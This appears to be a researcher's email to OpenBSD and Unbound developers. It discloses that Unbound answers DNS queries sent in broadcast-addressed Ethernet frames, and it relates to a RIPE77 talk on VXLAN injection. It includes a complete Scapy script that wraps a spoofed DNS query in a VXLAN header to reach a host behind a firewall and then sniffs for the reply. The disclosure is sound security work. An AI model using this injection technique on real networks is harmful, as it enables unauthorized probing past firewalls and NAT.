Hi OpenBSD - Peter Hessler phessler and NLnetlabs - Unbound people I did a small VXLAN related presentation today at RIPE77: VXLAN Security or Injection https://ripe77.ripe.net/wp-content/uploads/presentations/32-vxlan-ripe77.pdf
which is also on Github https://github.com/kramse/security-courses/tree/master/presentations/network/vxlan-ripe77 and includes this quote: "Fun fact, Unbound on OpenBSD reply to DNS requests received in Ethernet packets with broadcast destination and IP destination being the IP of the server} " and Peter asked me to send email with details, and I am available for any questions you might have. I had a small experimental network using OpenBSD as VXLAN routers, and small Beagle Bone Black devices running OpenBSD What I discovered was that sending DNS query in Ethernet frames with ff:ff:ff:ff:ff:ff broadcast as MAC destination and IP destination of the server - an IP it has - DID - get a response. The behaviour was surprising, but may be right. - and interesting for me, as I want to create some scanning method, and the less I need to know about the network, the better :-) My script using Scapy was something like the below, but you can probably just use, if on same subnet: ... packet=Ether(dst=broadcastmac,src=randommac)/IP(src=attacker, dst=destination)/UDP(sport=testport,dport=insideport)/DNS(rd=1,id=0xdead,qd=DNSQR(qname="www.wikipedia.org")) sendp(packet,loop=0) without the VXLAN header. If you prefer I can also generate PCAPs instead. hlk@cornerstone03:~$ cat direct-dns-udp-example.py #!/usr/bin/python # # Sources # http://etherealmind.com/%e2%97%8e-comparing-arista-and-brocade-vxlan-vtep-hardware-termination/ ###[ Loading modules ]### import sys import getopt from scapy.all import PcapReader, wrpcap, Packet, NoPayload from scapy.all import * from threading import Thread # First layer # Note this is the first router for the attacker host! # Not really needed, I found out later routermac="ac:4b:c8:84:77:c3" vtepsrc="10.10.9.77" vtepdst="10.10.6.78" # Check working from cornerstone03 - with the above MAC for local router! #vtepdst="91.102.91.18" vxlanport=4789 # Inside packet # security-lab01 #dstmac="00:50:56:ba:63:2d" #vni=21 # Nettest 10.96.0.10 dstmac="00:50:56:ba:50:e8" vni=37 vxlan=Ether(dst=routermac)/IP(src=vtepsrc,dst=vtepdst)/UDP(sport=vxlanport,dport=vxlanport)/VXLAN(vni=vni,flags="Instance") # Make VXLAN packet # firewall fwmac="10:00:00:0c:01:00" # Try sending out through firewall #dstmac="ff:ff:ff:ff:ff:ff" broadcastmac="ff:ff:ff:ff:ff:ff" nettestmac="00:50:56:ba:50:e8" dnspanopto="50:6b:8d:70:e9:24" randommac="00:51:52:b3:54:e5" attacker="185.27.115.6" destination="10.96.0.18" # sport is the one we want to contact inside the firewall, using as source opens firewall insideport=53 # dport is a high port, just make this look like a normal request testport=54040 packet=vxlan/Ether(dst=broadcastmac,src=randommac)/IP(src=attacker, dst=destination)/UDP(sport=testport,dport=insideport)/DNS(rd=1,id=0xdead,qd=DNSQR(qname="www.wikipedia.org")) print "Sending this packet" packet.show() print "and then waiting for something, not from same IP! From inside NAT so another source IP" pid = os.fork() if pid: # we are the parent print "parent: setting up sniffing" # Wait for UDP packet data = sniff(filter="udp and port 54040 and net 109.105.96.0/19", count=1) else: # we are the child time.sleep(10) print "child: sending packet" sendp(packet,loop=0) print "child: closing" sys.exit(0) print "After fork and things" #print data.summary() data[0].show() # Dissecting the packet ip=data[0].getlayer(IP) udp=data[0].getlayer(UDP).decode_payload_as(DNS) print udp -- Mvh/Best regards Henrik — Henrik Lund Kramshøj, Follower of the Great Way of Unix internet samurai cand.scient CISSP [email protected] [email protected] +45 2026 6000
